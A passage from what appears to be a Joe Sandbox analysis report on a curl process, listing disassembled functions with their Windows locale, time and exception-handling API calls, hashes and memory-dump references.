                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3475089800-0
                                                                                                                                                                    • Opcode ID: b70e82e7e1dfb854d79b1400a7c11245d0f833dac778ca5cd24d6c700273af93
                                                                                                                                                                    • Instruction ID: 336139fcb5840c5635cc4f081b4dd730741351bed961778c472408a17c809217
                                                                                                                                                                    • Opcode Fuzzy Hash: b70e82e7e1dfb854d79b1400a7c11245d0f833dac778ca5cd24d6c700273af93
                                                                                                                                                                    • Instruction Fuzzy Hash: 2F517F7592421A9EDF20EFA4DC89FBA77B8EF04700F04046BE905DB291E7719D64CBA1
                                                                                                                                                                    Function 002D6C8C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,002D6EE8,?,00000000), ref: 002D6CD0
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,002D6EE8,?,00000000), ref: 002D6CFA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                    • Opcode ID: eedf35710ac953fa0e5d89b36fcd6706f626110ef23476253cab9da428bf87b2
                                                                                                                                                                    • Instruction ID: 21c2ccf7c67896ff7105612ff3242283add33be2830a268749a4a89e40c45230
                                                                                                                                                                    • Opcode Fuzzy Hash: eedf35710ac953fa0e5d89b36fcd6706f626110ef23476253cab9da428bf87b2
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D018C31631616AAEB109E54EC8DE9A37A8EF04760B148017F908DA291E770EEA1CB90
                                                                                                                                                                    Function 002CEDCF Relevance: 6.1, APIs: 4, Instructions: 53timethreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 002CEE03
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002CEE12
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 002CEE1B
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 002CEE28
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                    • Opcode ID: 6a2e2b4ff1360142f174c71e5013fa39657d0b8ba168ec98a689f9a6430e95c9
                                                                                                                                                                    • Instruction ID: ef86d790c50546f75da2636bfc84ead453daa149083245defcb1b17bae40f8c4
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a2e2b4ff1360142f174c71e5013fa39657d0b8ba168ec98a689f9a6430e95c9
                                                                                                                                                                    • Instruction Fuzzy Hash: C6119E71D122089BCF14CFB9E958BAEB7B8EB48311F61056BD807D7250EA309A11CB51
                                                                                                                                                                    Function 001F80B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: bind() failed; %s
                                                                                                                                                                    • API String ID: 0-1141498939
                                                                                                                                                                    • Opcode ID: dfa085e05737a66e6bcb27855c6aab6761b5d84b5cab7a5d10288cff0bff5007
                                                                                                                                                                    • Instruction ID: ece851ef047b3296e7b4eb02d91335f176d09aba6c5100bebc3bff978ec3d0fa
                                                                                                                                                                    • Opcode Fuzzy Hash: dfa085e05737a66e6bcb27855c6aab6761b5d84b5cab7a5d10288cff0bff5007
                                                                                                                                                                    • Instruction Fuzzy Hash: 7331B275600706DFD7218F28DC88BE6BBE4EF48311F04052AE9158B391DB71A899CBA1
                                                                                                                                                                    Function 002CC584 Relevance: 4.8, APIs: 3, Instructions: 273timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002C8F5F: EnterCriticalSection.KERNEL32(00000000,?,002C5D8A,0000000D), ref: 002C8F8A
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(00367F78,00000000,00000000,00000000,00000000,00000000,00307F28,00000030,002CC335,00307F08,00000008,002C124C,?,00000000,?,000003E8), ref: 002CC6B3
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00367F7C,000000FF,?,0000003F,00000000,?), ref: 002CC72C
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00367FD0,000000FF,?,0000003F,00000000,?), ref: 002CC765
                                                                                                                                                                      • Part of subcall function 002BE832: RtlFreeHeap.NTDLL(00000000,00000000,?,002C5D32,00000000,002DA609,00000001,00000000), ref: 002BE846
                                                                                                                                                                      • Part of subcall function 002BE832: GetLastError.KERNEL32(00000000,?,002C5D32,00000000,002DA609,00000001,00000000), ref: 002BE858
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1184061189-0
                                                                                                                                                                    • Opcode ID: f9da01cbad48cc4634e0d7be1a4b522e84e40266366e79f3cbcbd24a377e95ee
                                                                                                                                                                    • Instruction ID: b36b4e4b213e9f929e8dcec788bdaeb4add4b360299904af32b40cfddecd0e55
                                                                                                                                                                    • Opcode Fuzzy Hash: f9da01cbad48cc4634e0d7be1a4b522e84e40266366e79f3cbcbd24a377e95ee
                                                                                                                                                                    • Instruction Fuzzy Hash: 3CA18271D242069EDB16DFA8D845FADBBB8EF49710F74421EE408AB2A1D7748C61CF14
                                                                                                                                                                    Function 002D696D Relevance: 4.7, APIs: 3, Instructions: 174COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 002D69C6
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 002D6A13
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 002D6AC3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: 0104665a551c6d9525a3d11cd6679c1450eb6a1fc47cf09dab49ad393e1f24a4
                                                                                                                                                                    • Instruction ID: 1acfa392290314973eff66b57233ee7086fa83dceb20be16c11da1ecb8173408
                                                                                                                                                                    • Opcode Fuzzy Hash: 0104665a551c6d9525a3d11cd6679c1450eb6a1fc47cf09dab49ad393e1f24a4
                                                                                                                                                                    • Instruction Fuzzy Hash: BA51D1725606179FDB249F24CC8ABB6B7A8EF14314F14807BE944DA291EB75ED60CF10
                                                                                                                                                                    Function 002CBAE1 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,002C5AAF,?,?,?,00000001), ref: 002CBAE6
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002CBAEF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                    • Opcode ID: f15f020cc498ba2661b25687e54d264c4756644103b6f41b4d13da9954a520ff
                                                                                                                                                                    • Instruction ID: 374b28d4bb5e77d48e2f2c8ebbbbeafa9a405b1dbe9d77555a290584769507ac
                                                                                                                                                                    • Opcode Fuzzy Hash: f15f020cc498ba2661b25687e54d264c4756644103b6f41b4d13da9954a520ff
                                                                                                                                                                    • Instruction Fuzzy Hash: 6BB09231485608ABCB002B91FC0EB58BF29EB09652F008012F60D44061CB72D8118A91
                                                                                                                                                                    Function 002D6B62 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 002D6BBB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: ae6e85a4b7b8e7a6ece7969360c9d83124fd1644d9370c2859bc62664ae500b1
                                                                                                                                                                    • Instruction ID: bf368188d4bb68bcc29b24470ae8eaedc328f0761d2949af27337ccb3f1123a7
                                                                                                                                                                    • Opcode Fuzzy Hash: ae6e85a4b7b8e7a6ece7969360c9d83124fd1644d9370c2859bc62664ae500b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 1021AF72570207ABDB249F24DC49FBA77ACEB04714F10417BED41C6241EB75AD64CB60
                                                                                                                                                                    Function 002D686D Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(002D696D,00000001,000000A0,?,?,002D6E91,00000000,?,?,?,?,?,00000055), ref: 002D68C8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
